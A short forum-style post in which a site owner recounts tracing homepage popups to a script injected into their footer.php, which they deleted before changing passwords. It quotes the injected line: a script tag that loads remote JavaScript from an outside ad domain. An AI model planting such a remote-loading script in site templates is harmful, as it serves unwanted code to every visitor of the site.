After a total re-work of the homepage, it came down to the Kimili Flash Embed Plugin that was causing the issue. I am now using the Easy Flash Embed without any problems.

I looked through the code on each page and I found this at the bottom of each page:

<script type=”text/javascript”>username=”pirmax”</script><script type=”text/javascript” src=”http://www.cpx24.com/ad1.js”></script&gt;

I located this in the footer.php

I deleted and resaved the file. The popups are now gone.

I am changing my passwords 🙂
